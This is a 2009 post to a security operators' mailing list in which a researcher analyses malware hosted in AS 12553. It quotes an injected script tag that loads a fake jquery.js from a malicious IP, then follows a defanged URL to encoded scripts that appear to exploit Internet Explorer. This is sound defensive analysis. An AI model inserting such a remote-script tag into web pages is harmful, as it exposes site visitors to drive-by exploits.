[nsp-sec] ATTN AS 12553 malware hosting
Jose Nazario
jose at arbor.net
Wed Apr 8 11:07:44 EDT 2009
On Wed, 8 Apr 2009, Mike Tancsa wrote:
> <script src = //94.247.2.195 / jquery.js> </script>
despite the following which says it's benign:
http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&type=js
phoneyc finds an issue. it leads to:
hxxp://94.247.2.195/news/?id=100
which is doubly encoded and leads to some VBS and some JS that looks like
an IE exploit. AV did not detect the encoded script with any assistance.
but yes, looks malicious even though wepawet was unable to identify it.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
manager of security research arbor networks
v: (734) 821 1427 http://asert.arbor.net/